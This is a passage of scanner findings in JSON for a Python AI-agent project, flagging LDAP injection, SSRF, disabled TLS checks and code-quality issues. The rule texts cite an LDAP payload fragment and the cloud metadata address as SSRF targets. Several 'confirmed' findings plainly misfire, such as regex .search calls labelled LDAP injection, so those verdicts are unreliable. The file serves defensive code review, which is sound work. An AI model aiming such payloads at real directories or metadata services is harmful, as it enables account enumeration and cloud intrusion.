["CWE-682"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347918+00:00", "triaged_in_corpus": 15, "observations_count": 208571, "ai_coder_pattern_id": 20}, "scanner": "repobility-threat-engine", "correlation_key": "fp|d7f34875336ae85fd78f4166dea26e9d421bcf111fa38d3acecf7c380897c050"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/pricing.py"}, "region": {"startLine": 186}}}]}, {"ruleId": "SEC103", "level": "error", "message": {"text": "[SEC103] LDAP injection \u2014 non-constant search filter: User input concatenated into an LDAP search filter. Attackers inject `*)(uid=*` style payloads to bypass auth or enumerate accounts."}, "properties": {"repobilityId": 46508, "scanner": "repobility-threat-engine", "fingerprint": "7a308d577df55b5493e9b2234c20e4b13889b3652987abd5879393222342f1b8", "category": "injection", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": ".search(r\"(\\d+)", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC103", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|injection|src/utils/git.py|200|sec103"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/utils/git.py"}, "region": {"startLine": 200}}}]}, {"ruleId": "SEC103", "level": "error", "message": {"text": "[SEC103] LDAP injection \u2014 non-constant search filter: User input concatenated into an LDAP search filter. Attackers inject `*)(uid=*` style payloads to bypass auth or enumerate accounts."}, "properties": {"repobilityId": 46507, "scanner": "repobility-threat-engine", "fingerprint": "c53d41377ef48ed2e2dd178c1b4d5e06dec8a35ce8ca4265decd123f81d31e4c", "category": "injection", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": ".search(r\"prompt is too long[^0-9]*(\\d+)", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC103", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|injection|src/services/api/errors.py|97|sec103"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/services/api/errors.py"}, "region": {"startLine": 97}}}]}, {"ruleId": "MINED014", "level": "error", "message": {"text": "[MINED014] Disabled Tls Verify: verify=False in requests, rejectUnauthorized:false in node, InsecureSkipVerify:true in Go."}, "properties": {"repobilityId": 46506, "scanner": "repobility-threat-engine", "fingerprint": "9a176134cb16d3876c25b108e741d61dd2bc3de1601a9cb5cd073416688f11e3", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "disabled-tls-verify", "owasp": "A02:2021", "cwe_ids": ["CWE-295"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347930+00:00", "triaged_in_corpus": 15, "observations_count": 86916, "ai_coder_pattern_id": 16}, "scanner": "repobility-threat-engine", "correlation_key": "fp|9a176134cb16d3876c25b108e741d61dd2bc3de1601a9cb5cd073416688f11e3"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/openrouter_provider.py"}, "region": {"startLine": 65}}}]}, {"ruleId": "MINED014", "level": "error", "message": {"text": "[MINED014] Disabled Tls Verify: verify=False in requests, rejectUnauthorized:false in node, InsecureSkipVerify:true in Go."}, "properties": {"repobilityId": 46505, "scanner": "repobility-threat-engine", "fingerprint": "805f8cfa0ff714ec7d23e90e2491124192119bed9e1823f9c02f6e245fc5129b", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "disabled-tls-verify", "owasp": "A02:2021", "cwe_ids": ["CWE-295"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347930+00:00", "triaged_in_corpus": 15, "observations_count": 86916, "ai_coder_pattern_id": 16}, "scanner": "repobility-threat-engine", "correlation_key": "fp|805f8cfa0ff714ec7d23e90e2491124192119bed9e1823f9c02f6e245fc5129b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/openai_provider.py"}, "region": {"startLine": 43}}}]}, {"ruleId": "MINED014", "level": "error", "message": {"text": "[MINED014] Disabled Tls Verify: verify=False in requests, rejectUnauthorized:false in node, InsecureSkipVerify:true in Go."}, "properties": {"repobilityId": 46504, "scanner": "repobility-threat-engine", "fingerprint": "588d28c992b0b0aa3ff41587a209214c1fb41814c5f69d0529c91be4212656eb", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "disabled-tls-verify", "owasp": "A02:2021", "cwe_ids": ["CWE-295"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347930+00:00", "triaged_in_corpus": 15, "observations_count": 86916, "ai_coder_pattern_id": 16}, "scanner": "repobility-threat-engine", "correlation_key": "fp|588d28c992b0b0aa3ff41587a209214c1fb41814c5f69d0529c91be4212656eb"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/providers/deepseek_provider.py"}, "region": {"startLine": 56}}}]}, {"ruleId": "SEC029", "level": "error", "message": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.254.169.254 metadata, internal Kubernetes endpoints, file:// URIs), exfiltrate data, or pivot through your network. SSRF is OWASP A10:2021 and a frequent foothold in cloud breaches."}, "properties": {"repobilityId": 46491, "scanner": "repobility-threat-engine", "fingerprint": "7503641aec885e8318025ec5ab53a41ab98c2a7805031a9dcb7b90564121abc2", "category": "ssrf", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "url(u", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC029", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|7503641aec885e8318025ec5ab53a41ab98c2a7805031a9dcb7b90564121abc2"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/hooks/exec_http_hook.py"}, "region": {"startLine": 26}}}]}, {"ruleId": "SEC029", "level": "error", "message": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.254.169.254 metadata, internal Kubernetes endpoints, file:// URIs), exfiltrate data, or pivot through your network. SSRF is OWASP A10:2021 and a frequent foothold in cloud breaches."}, "properties": {"repobilityId": 46490, "scanner": "repobility-threat-engine", "fingerprint": "d76d0ec24b2f09729e6c34a107ef8867aabcacbe8f5fd63c216b1257a14bf0fc", "category": "ssrf", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "url(a", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC029", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|d76d0ec24b2f09729e6c34a107ef8867aabcacbe8f5fd63c216b1257a14bf0fc"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/bridge/work_secret.py"}, "region": {"startLine": 95}}}]}, {"ruleId": "SEC029", "level": "error", "message": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input: Outbound HTTP request to a user-controlled URL without allowlist validation. Attackers can probe internal services (169.254.169.254 metadata, internal Kubernetes endpoints, file:// URIs), exfiltrate data, or pivot through your network. SSRF is OWASP A10:2021 and a frequent foothold in cloud breaches."}, "properties": {"repobilityId": 46489, "scanner": "repobility-threat-engine", "fingerprint": "7f8314944440aee3685484fa6aa30b46b38e43b8cf3a5ec9cfdd58de281a549c", "category": "ssrf", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "urllib.request.urlopen(r", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC029", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|7f8314944440aee3685484fa6aa30b46b38e43b8cf3a5ec9cfdd58de281a549c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/oauth.py"}, "region": {"startLine": 134}}}]}, {"ruleId": "MINED001", "level": "error", "message": {"text": "[MINED001] Bare Except Pass: except: pass or except Exception: pass \u2014 silently swallows everything including KeyboardInterrupt and bugs."}, "properties": {"repobilityId": 46479, "scanner": "repobility-threat-engine", "fingerprint": "882ce560e4a0eefef2c54f42785ee09668e3ef8d918cebe94dfd9010136b7b4c", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "bare-except-pass", "owasp": null, "cwe_ids": ["CWE-755"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347744+00:00", "triaged_in_corpus": 15, "observations_count": 1550824, "ai_coder_pattern_id": 6}, "scanner": "repobility-threat-engine", "correlation_key": "fp|882ce560e4a0eefef2c54f42785ee09668e3ef8d918cebe94dfd9010136b7b4c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/auth/auth.py"}, "region": {"startLine": 85}}}]}, {"ruleId": "MINED001", "level": "error", "message": {"text": "[MINED001] Bare Except Pass: except: pass or except Exception: pass \u2014 silently swallows everything including KeyboardInterrupt and bugs."}, "properties": {"repobilityId": 46478, "scanner": "repobility-threat-engine", "fingerprint": "95bbd95d09762131e2cdfabc63348a7f0e42cb6fc736f4fbebc882d3a39e5b23", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "bare-except-pass", "owasp": null, "cwe_ids": ["CWE-755"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347744+00:00", "triaged_in_corpus": 15, "observations_count": 1550824, "ai_coder_pattern_id": 6}, "scanner": "repobility-threat-engine", "correlation_key": "fp|95bbd95d09762131e2cdfabc63348a7f0e42cb6fc736f4fbebc882d3a39e5b23"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/agent/foreground_promotion.py"}, "region": {"startLine": 194}}}]}, {"ruleId": "MINED001", "level": "error", "message": {"text": "[MINED001] Bare Except Pass: except: pass or except Exception: pass \u2014 silently swallows everything including KeyboardInterrupt and bugs."}, "properties": {"repobilityId": 46477, "scanner": "repobility-threat-engine", "fingerprint": "b20fdf9ba1217e884fbc9831cf556a2c4e383e736b81daf487030ca4b6b11a82", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "bare-except-pass", "owasp": null, "cwe_ids": ["CWE-755"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347744+00:00", "triaged_in_corpus": 15, "observations_count": 1550824, "ai_coder_pattern_id": 6}, "scanner": "repobility-threat-engine", "correlation_key": "fp|b20fdf9ba1217e884fbc9831cf556a2c4e383e736b81daf487030ca4b6b11a82"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/agent/agent_tool_utils.py"}, "region": {"startLine": 292}}}]}, {"ruleId": "MINED006", "level": "error", "message": {"text": "[MINED006] Overcatch Baseexception: except BaseException: ... \u2014 prevents Ctrl+C and SystemExit from working."}, "properties": {"repobilityId": 46476, "scanner": "repobility-threat-engine", "fingerprint": "184582cf49c934271482dee3b6d83479fa73e26ccec2a5e85466b915a04e750c", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "overcatch-baseexception", "owasp": null, "cwe_ids": ["CWE-705"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347911+00:00", "triaged_in_corpus": 15, "observations_count": 230624, "ai_coder_pattern_id": 8}, "scanner": "repobility-threat-engine", "correlation_key": "fp|184582cf49c934271482dee3b6d83479fa73e26ccec2a5e85466b915a04e750c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/tool_system/registry.py"}, "region": {"startLine": 169}}}]}, {"ruleId": "MINED006", "level": "error", "message": {"text": "[MINED006] Overcatch Baseexception: except BaseException: ... \u2014 prevents Ctrl+C and SystemExit from working."}, "properties": {"repobilityId": 46475, "scanner": "repobility-threat-engine", "fingerprint": "a8fcb79c01f0b13b037cac6fe55416b8de105af91cfc519b8a8299994f7307e2", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "overcatch-baseexception", "owasp": null, "cwe_ids": ["CWE-705"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347911+00:00", "triaged_in_corpus": 15, "observations_count": 230624, "ai_coder_pattern_id": 8}, "scanner": "repobility-threat-engine", "correlation_key": "fp|a8fcb79c01f0b13b037cac6fe55416b8de105af91cfc519b8a8299994f7307e2"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/entrypoints/tui.py"}, "region": {"startLine": 149}}}]}, {"ruleId": "MINED006", "level": "error", "message": {"text": "[MINED006] Overcatch Baseexception: except BaseException: ... \u2014 prevents Ctrl+C and SystemExit from working."}, "properties": {"repobilityId": 46474, "scanner": "repobility-threat-engine", "fingerprint": "c7fb6c8015a2c3ff65da71cfc758d24db0cc69fc760be65825fd15494212d169", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "overcatch-baseexception", "owasp": null, "cwe_ids": ["CWE-705"], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.347911+00:00", "triaged_in_corpus": 15, "observations_count": 230624, "ai_coder_pattern_id": 8}, "scanner": "repobility-threat-engine", "correlation_key": "fp|c7fb6c8015a2c3ff65da71cfc758d24db0cc69fc760be65825fd15494212d169"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "scripts/diagnose_keys.py"}, "region": {"startLine": 96}}}]}, {"ruleId": "COMP001", "level": "error", "message": {"text": "[COMP001] High cognitive complexity: Function `main` has cognitive complexity 40 (SonarSource scale). Cognitive complexity measures how hard the function is for a human to understand \u2014 nested branches, boolean chains, and recursion all weigh in. Breakdown: break=2, continue=3, else=1, except=1, for=3, if=8, nested_bonus=20, ternary=1, while=1."}, "properties": {"repobilityId": 46463, "scanner": "repobility-threat-engine", "fingerprint": "0bdb60ed4fd2b75a078b42c63e5ef9b5f9298187fc64a50495d734de08c1bf1b", "category": "quality", "severity": "high", "confidence": 0.95, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "AST-derived cognitive complexity score = 40 (severity threshold for high: 25+).", "evidence": {"scanner": "repobility-threat-engine", "function": "main", "breakdown": {"if": 8, "for": 3, "else": 1, "break": 2, "while": 1, "except": 1, "ternary": 1, "continue": 3, "nested_bonus": 20}, "complexity": 40, "correlation_key": "fp|0bdb60ed4fd2b75a078b42c63e5ef9b5f9298187fc64a50495d734de08c1bf1b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "eval/pick_batch.py"}, "region": {"startLine": 36}}}]}, {"ruleId": "SEC128", "level": "error", "message": {"text": "[SEC128] Async function without await \u2014 fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work completes \u2014 DB writes lost, emails not sent, race conditions. This is one of the top-3 errors AI coders make: they understand async-shape but drop the await keyword when chaining multiple ops. Surfaces as flaky tests or silently dropped data in production."}, "properties": {"repobilityId": 46459, "scanner": "repobility-threat-engine", "fingerprint": "6ea8428a056a02438cb5a8608b817835c427a4c4bb988cd3ee7e0e7f1febf18b", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "runtime_tasks.update(agent_id, _maybe_claim)", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC128", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|6ea8428a056a02438cb5a8608b817835c427a4c4bb988cd3ee7e0e7f1febf18b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/agent/resume_agent.py"}, "region": {"startLine": 124}}}]}, {"ruleId": "SEC128", "level": "error", "message": {"text": "[SEC128] Async function without await \u2014 fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work completes \u2014 DB writes lost, emails not sent, race conditions. This is one of the top-3 errors AI coders make: they understand async-shape but drop the await keyword when chaining multiple ops. Surfaces as flaky tests or silently dropped data in production."}, "properties": {"repobilityId": 46458, "scanner": "repobility-threat-engine", "fingerprint": "d6eaf24aab81f2c8a28695e283b00e24aadf804c428a14808536d774b930a80c", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "registry.update(agent_id, _flip)", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC128", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|d6eaf24aab81f2c8a28695e283b00e24aadf804c428a14808536d774b930a80c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/agent/foreground_promotion.py"}, "region": {"startLine": 75}}}]}, {"ruleId": "SEC128", "level": "error", "message": {"text": "[SEC128] Async function without await \u2014 fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. The outer function resolves before the inner work completes \u2014 DB writes lost, emails not sent, race conditions. This is one of the top-3 errors AI coders make: they understand async-shape but drop the await keyword when chaining multiple ops. Surfaces as flaky tests or silently dropped data in production."}, "properties": {"repobilityId": 46457, "scanner": "repobility-threat-engine", "fingerprint": "9f99df798ba712f68420da9b9777c9e65860d3b4207976896c707fc925a9d0f9", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "next.delete(personId)", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC128", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "fp|9f99df798ba712f68420da9b9777c9e65860d3b4207976896c707fc925a9d0f9"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "demos/linkedin-app/src/context/LinkedInContext.jsx"}, "region": {"startLine": 136}}}]}, {"ruleId": "MINED110", "level": "error", "message": {"text": "Blocking call `requests.append` inside async function `test_permission_request_fires_callback`"}, "properties": {"repobilityId": 46428, "scanner": "repobility-ast-engine", "fingerprint": "9749fce61f40cf0312a0038e2244aa9250e162300cafac53a50de3ca07dadbc7", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "asyncio-blocking-call", "owasp": null, "cwe_ids": ["CWE-833"], "languages": ["python"], "observations_count": 31606}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9749fce61f40cf0312a0038e2244aa9250e162300cafac53a50de3ca07dadbc7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/bridge/test_session_runner.py"}, "region": {"startLine": 535}}}]}, {"ruleId": "MINED110", "level": "error", "message": {"text": "Blocking call `time.sleep` inside async function `test_reload_if_changed`"}, "properties": {"repobilityId": 46423, "scanner": "repobility-ast-engine", "fingerprint": "7c3585539f3ecd7df6f267e298d1a6f24748181f44e919314f4c7466b81e245d", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "asyncio-blocking-call", "owasp": null, "cwe_ids": ["CWE-833"], "languages": ["python"], "observations_count": 31606}, "scanner": "repobility-ast-engine", "correlation_key": "fp|7c3585539f3ecd7df6f267e298d1a6f24748181f44e919314f4c7466b81e245d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_hook_config.py"}, "region": {"startLine": 242}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_pre_action_invokes_init"}, "properties": {"repobilityId": 46421, "scanner": "repobility-ast-engine", "fingerprint": "5323c4d53a0716a7929448f1131d0b779d42ce24f1eea5d76c7a950e86e3dd68", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5323c4d53a0716a7929448f1131d0b779d42ce24f1eea5d76c7a950e86e3dd68"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_init.py"}, "region": {"startLine": 139}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_check_permissions_unchanged_for_outside_path"}, "properties": {"repobilityId": 46420, "scanner": "repobility-ast-engine", "fingerprint": "179bea560bef2eaaa85159b5dbbf6b8358d46d4c0fcee09f2240288f1d35853e", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|179bea560bef2eaaa85159b5dbbf6b8358d46d4c0fcee09f2240288f1d35853e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_memdir_write_carve_out.py"}, "region": {"startLine": 97}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_check_permissions_passes_through_for_memory_md"}, "properties": {"repobilityId": 46419, "scanner": "repobility-ast-engine", "fingerprint": "a8b163d771ed51b2418cbf0b5f8b0e6018fa921f47b173d60eac5591ee999d59", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|a8b163d771ed51b2418cbf0b5f8b0e6018fa921f47b173d60eac5591ee999d59"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_memdir_write_carve_out.py"}, "region": {"startLine": 90}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_timeout_raises"}, "properties": {"repobilityId": 46418, "scanner": "repobility-ast-engine", "fingerprint": "81e435b0a05a800f94f1f996c83a8ae5fb995a8c3705ff31c371e4adb006e2a7", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|81e435b0a05a800f94f1f996c83a8ae5fb995a8c3705ff31c371e4adb006e2a7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_mcp_phase4_callback_and_provider.py"}, "region": {"startLine": 125}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_missing_code_raises"}, "properties": {"repobilityId": 46417, "scanner": "repobility-ast-engine", "fingerprint": "d0bda0493bae6cb97942bf224427e0c1efca92fa710863494b81767f6f3d19c1", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|d0bda0493bae6cb97942bf224427e0c1efca92fa710863494b81767f6f3d19c1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_mcp_phase4_callback_and_provider.py"}, "region": {"startLine": 107}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_error_param_raises_with_description"}, "properties": {"repobilityId": 46416, "scanner": "repobility-ast-engine", "fingerprint": "938a156e49d5d73e9761d634d76eea045ea2c3afc13bfcfb9958d4f292d5deab", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|938a156e49d5d73e9761d634d76eea045ea2c3afc13bfcfb9958d4f292d5deab"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_mcp_phase4_callback_and_provider.py"}, "region": {"startLine": 86}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_state_mismatch_raises"}, "properties": {"repobilityId": 46415, "scanner": "repobility-ast-engine", "fingerprint": "fd901148a100e4d06d23d18a28b048e3ea71f55b253d89af33e1911f1e40cff5", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|fd901148a100e4d06d23d18a28b048e3ea71f55b253d89af33e1911f1e40cff5"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_mcp_phase4_callback_and_provider.py"}, "region": {"startLine": 68}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_save_session"}, "properties": {"repobilityId": 46414, "scanner": "repobility-ast-engine", "fingerprint": "cb50a7088bfa67b8a280b30c40ef525e7ca8db95e4359c4f9d06ba99e5a34864", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|cb50a7088bfa67b8a280b30c40ef525e7ca8db95e4359c4f9d06ba99e5a34864"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_repl.py"}, "region": {"startLine": 463}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_chat_uses_query_engine_on_stream_init_failure"}, "properties": {"repobilityId": 46413, "scanner": "repobility-ast-engine", "fingerprint": "9a56c716648d14ef90c0110f2c969dffd125484049a810c018dbee1b4ce6692c", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9a56c716648d14ef90c0110f2c969dffd125484049a810c018dbee1b4ce6692c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_repl.py"}, "region": {"startLine": 351}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_chat_uses_query_engine_for_code_task"}, "properties": {"repobilityId": 46412, "scanner": "repobility-ast-engine", "fingerprint": "d6b2779a30dfbdb545b46ebb33adc2d7d57bc8375c585b29ce8f2ebb4fb92211", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|d6b2779a30dfbdb545b46ebb33adc2d7d57bc8375c585b29ce8f2ebb4fb92211"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_repl.py"}, "region": {"startLine": 324}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_handle_command_clear"}, "properties": {"repobilityId": 46411, "scanner": "repobility-ast-engine", "fingerprint": "2df60b144c564678eb30ea5828bca5aced916c1e21279cb5ccbb2aee22115485", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|2df60b144c564678eb30ea5828bca5aced916c1e21279cb5ccbb2aee22115485"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_repl.py"}, "region": {"startLine": 131}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_task_state_base_is_kw_only"}, "properties": {"repobilityId": 46410, "scanner": "repobility-ast-engine", "fingerprint": "74f56bf7ed9fa3f057f5165a339636662afd3fd518190d9e304d4c97c3378d0d", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": 